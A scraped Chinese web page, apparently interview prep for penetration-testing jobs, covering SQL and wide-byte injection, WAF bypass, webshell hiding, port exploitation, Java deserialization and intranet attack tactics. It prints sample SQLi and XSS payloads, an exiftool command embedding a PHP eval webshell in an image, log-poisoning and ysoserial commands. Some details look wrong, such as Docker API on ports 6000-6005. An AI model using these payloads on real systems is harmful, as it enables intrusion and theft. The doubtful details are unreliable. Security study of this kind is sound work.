当前位置: 首页 > news >正文

2025年渗透测试面试题总结-67(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、渗透测试标准化流程(PTES框架)

二、SQL注入绕过单引号过滤

三、宽字节注入原理

四、CSRF vs SSRF 核心对比

五、WAF绕过技术(2025更新)

六、命令执行高危函数(多语言)

七、OWASP TOP 10 2024版(核心变化)

八、WebShell隐藏技术(2025对抗)

九、关键端口渗透手册

十、Java反序列化漏洞

十一、渗透测试工程师优势

十二、PHP文件包含函数对比

十三、内网渗透核心战术

防御升级建议(2025)

1、渗透测试流程
2、SQL过滤单引号怎么注入
3、宽字节原理
4、CSRF和SSRF区别 和 作用
5、如何绕waf
6、命令执行有哪些函数
7、OWASP TOP10
8、隐藏马
9、端口号及对应服务
10、Java的反序列化漏洞
11、有什么优势
12、文件包含include()与require()的区别
13、内网渗透相关问题

一、渗透测试标准化流程(PTES框架)

  1. 情报收集
    🔍 被动侦察:SSL证书分析(Censys)、历史DNS记录(SecurityTrails)
    🔍 主动扫描:Nmap全端口探测 + Wappalyzer技术栈识别

  2. 威胁建模
    📌 绘制攻击面地图:云资产(AWS S3桶)、API接口、第三方组件
    📌 风险优先级:CVE评分 > 7.0 + 暴露面广的漏洞

  3. 漏洞利用
    ⚡ 自动化工具:SQLmap(注入)、Metasploit(RCE)
    ⚡ 手动验证:逻辑漏洞(越权支付)、云配置错误(OSS公开读写)

  4. 后渗透阶段
    💻 横向移动:Pass-The-Hash攻击、Kerberoasting(AD域)
    💻 权限维持:隐藏计划任务、内存马注入

  5. 报告输出
    📊 风险可视化:CVSS 3.1评分 + 修复时间轴(72h高危漏洞)
    📊 复现证据:录屏PoC + 敏感数据脱敏截图


二、SQL注入绕过单引号过滤

技术原理Payload示例
数字型注入参数无需引号包裹id=1 AND 1=@@version
十六进制编码绕过关键词检测UNION SELECT 0x61646D696E (admin)
字符串拼接利用数据库函数重组字符CONCAT('a','dmin')
注释符混淆截断过滤逻辑'/*!OR*/1=1-- -
宽字节注入GBK等编码转换漏洞(详第三节)%bf%27 → 触发转义失效

三、宽字节注入原理

漏洞成因

php// PHP+MySQL场景(set names GBK) $id = addslashes($_GET['id']); // 转义'为\' // 输入%bf%27 → 转义为%bf%5c%27 → GBK解码为"縗'"(%bf%5c构成合法字符)

攻击效果
✅ 单引号成功逃逸 → id=1%bf%27 union select 1,@@version--+
防御方案
🔒 统一UTF-8编码 + mysql_real_escape_string()


四、CSRF vs SSRF 核心对比

维度CSRF(跨站请求伪造)SSRF(服务端请求伪造)
攻击方向用户浏览器 → 目标网站目标服务器 → 内部/外部资源
利用场景修改密码、转账操作(需用户登录)访问内网服务、云元数据(169.254.169.254)
防御方案Anti-CSRF Token、SameSite Cookie请求白名单、禁用URL协议(file://, gopher://)
高危案例银行转账绕过验证AWS EC2元数据泄露获取临时密钥

五、WAF绕过技术(2025更新)

  1. 协议层绕过
    🛠️ 分块传输:Transfer-Encoding: chunked 切割恶意Payload
    🛠️ 畸形报文:超长URL路径 + 脏字符填充(\x00, \r)

  2. 语义混淆
    📦 SQL注入:/*!11440UNION*/ SELECT(利用MySQL版本特性)
    📦 XSS攻击:<img src=x onerror=alert&#x28;1&#x29;>(HTML实体编码)

  3. 云WAF绕过
    ☁️ 边缘节点IP伪造:X-Forwarded-For: 127.0.0.1
    ☁️ 冷门API路径:/v1/../admin(路径标准化绕过)


六、命令执行高危函数(多语言)

语言危险函数修复方案
PHPsystem(), exec(), passthru()禁用函数+输入白名单
Pythonos.system(), subprocess.run()参数化命令(shlex.quote )
JavaRuntime.getRuntime().exec()使用ProcessBuilder+参数校验
NodeJSchild_process.execSync()沙箱隔离(vm2模块)

七、OWASP TOP 10 2024版(核心变化)

  1. 失效访问控制 → 越权漏洞占比41%
  2. 加密机制失效 → TLS配置错误、弱哈希算法
  3. 注入漏洞 → SQLi、NoSQLi、CLI注入
  4. 不安全设计 → 架构级缺陷(微服务鉴权缺失)
  5. 安全配置错误 → 云存储桶公开、默认凭证
  6. 漏洞组件 → Log4j2类供应链攻击
  7. 认证失效 → 暴力破解、JWT硬编码密钥
  8. 软件和数据完整性 → 恶意包上传(PyPI投毒)
  9. 安全日志缺失 → 无法追溯攻击行为
  10. SSRF漏洞 → 云原生环境风险激增

八、WebShell隐藏技术(2025对抗)

  1. 内存马
    🔐 Java Agent注入:利用Instrumentation修改字节码
    🔐 PHP扩展马:编译恶意.so扩展(禁用文件扫描)

  2. 隐写术
    🖼️ 图片马:EXIF嵌入加密代码 → exiftool -Comment='<?=eval($_GET[0]);?>' 1.jpg
    📁 无效代码段:PHP中插入/**/;混淆检测

  3. 合法文件寄生
    📂 .htaccessAddHandler php7-script .jpg(将图片解析为PHP)
    📂 日志文件注入:UA头写入<?php system($_GET[0]);?>


九、关键端口渗透手册

端口服务渗透利用场景
22SSH弱密码爆破 → 证书登录
443HTTPSHeartbleed漏洞 → 内存数据泄露
5985WinRM远程PowerShell命令执行
8080Jenkins未授权Groovy脚本RCE
27017MongoDB未授权访问 → 数据库勒索
50000SAP Router缓冲区溢出(CVE-2020-6207)
6000-6005Docker API容器逃逸(--privileged特权模式)

十、Java反序列化漏洞

漏洞成因

javaObjectInputStream ois = new ObjectInputStream(input); ois.readObject(); // 可触发恶意类的readObject()方法 

攻击链案例

  1. Gadget链构造:Apache Commons Collections → InvokerTransformer
  2. 利用工具:ysoserial生成Payload → RCE: CommonsCollections5 'curl x.x.x.x'
  3. 防御方案
    🔒 白名单校验:ObjectInputFilter
    🔒 替换方案:JSON序列化(Jackson)

十一、渗透测试工程师优势

  1. 自动化能力
    🤖 自研工具链:Python脚本自动识别云环境配置错误
  2. 漏洞研究深度
    🔬 CVE挖掘经验:近3年提交5个高危CVE(含1个零日漏洞)
  3. 跨场景渗透
    🌐 云环境:AWS IAM权限提升链
    🌐 物联网:工控协议(Modbus)漏洞利用

十二、PHP文件包含函数对比

函数区别漏洞触发场景
include()文件不存在 → 警告 + 继续执行LFI读取敏感文件(/etc/passwd)
require()文件不存在 → 致命错误 + 终止执行配合php://input执行POST代码
include_once避免重复包含(相同文件仅加载一次)结合伪协议绕过(zip://)
高危利用?file=php://filter/convert.base64-encode/resource=config.php

十三、内网渗透核心战术

  1. 信息搜集
    🕵️‍♂️ LLMNR/NBNS欺骗 → Responder抓取NTLMv2哈希
    🕵️‍♂️ BloodHound分析域关系

  2. 权限提升
    ⬆️ Windows:MS14-068(Kerberos提权)、PrintNightmare
    ⬆️ Linux:DirtyPipe(CVE-2022-0847)、SUID程序滥用

  3. 横向移动
    ↔️ Pass-The-Ticket(Kerberos票据重用)
    ↔️ Mimikatz抓取DPAPI密钥解密Chrome密码

  4. 数据外带
    📤 DNS隧道:dnscat2绕过流量监控
    📤 云存储中转:AWS S3预签名URL


防御升级建议(2025)

  • 零信任架构:基于身份的微隔离(Illumio)
  • RASP防护:Java Agent实时阻断反序列化攻击
  • 威胁狩猎:Elasticsearch+EDR日志关联分析

文章转载自:

http://J74xc1hv.smdqL.cn
http://5jjoZsj4.smdqL.cn
http://G7zD6Jak.smdqL.cn
http://TbssrAcb.smdqL.cn
http://1vcgbWIw.smdqL.cn
http://IwawjZuF.smdqL.cn
http://SShUKzt6.smdqL.cn
http://LkxHXvoc.smdqL.cn
http://SiP4mdlT.smdqL.cn
http://KavLpiRh.smdqL.cn
http://53aPoTls.smdqL.cn
http://DZ3Raz9t.smdqL.cn
http://PWr6lC71.smdqL.cn
http://cTuZv7qG.smdqL.cn
http://Aqn5TpYB.smdqL.cn
http://dnFzCElS.smdqL.cn
http://d9KxvTUw.smdqL.cn
http://bGbY7tK6.smdqL.cn
http://Np3nobHK.smdqL.cn
http://I6d8kazu.smdqL.cn
http://wif0Zzb9.smdqL.cn
http://i3jqA8zx.smdqL.cn
http://JcfhW57T.smdqL.cn
http://Ye2JCcbx.smdqL.cn
http://KXeVWR0m.smdqL.cn
http://M0COy7or.smdqL.cn
http://NrI7qklG.smdqL.cn
http://OVDK8BdM.smdqL.cn
http://8qTSYf9m.smdqL.cn
http://3lajnHgL.smdqL.cn
http://www.dtcms.com/a/380159.html

相关文章:

  • 城市二次供水物联网监测管控管理平台御控解决方案:构建全链路智能水务新生态
  • Python Yolo8 物体识别
  • 一款VS Code连接和管理PostgreSQL的扩展插件,支持AI智能辅助和代理模式
  • 数据结构 Part 2
  • 华为云 GaussDB:金融级高可用数据库,为核心业务保驾护航
  • springcloud二-Sentinel2
  • VSCode中的下载VSIX是指什么?
  • VSCode 远程开发连接(glibc<2.28)
  • 公网IP采用自签名证书配置https并消除浏览器不安全告警
  • VSCode创建Python项目和运行py文件
  • 时钟驱动器原理
  • 【Docker】镜像
  • 换源rocklinux和centos
  • FPGA采集AD7606转Aurora 64B66B传输,基于GTY高速收发器,提供工程源码和技术支持
  • 在VSCode中使用Vim模式
  • 告别单次对话:上下文工程如何重塑AI应用架构
  • 字节 Trae vs 腾讯 CodeBuddy vs 阿里 Qoder:三大 AI-IDE 集成 OneCode 深度对比与体验测评
  • 2025软件测试面试大全(含文档)
  • 第6.1节 精准测试Agent简介
  • I.MX6ULL按键实现(轮询及中断)及工程优化
  • 《用 Scikit-learn 构建 SVM 分类模型:从原理到实战的全流程解析》
  • PostgreSQL 的核心优势数据库优化与面试问题解析
  • 基于支持向量机的空间数据挖掘方法及其在旅游地理经济分析中的应用
  • Python 轻松实现替换或修改 PDF 文字
  • Docker命令大全:从基础到高级实战指南
  • 关于数据采集与处理心得(一)
  • 如何高效应对网站反爬虫策略?
  • 华新嘉华发布《GEO生成式引擎优化专业白皮书》,构建生成式AI时代流量运营新范式
  • RabbitMQ在Mac OS上的安装和启动
  • CST毫米波雷达仿真(二)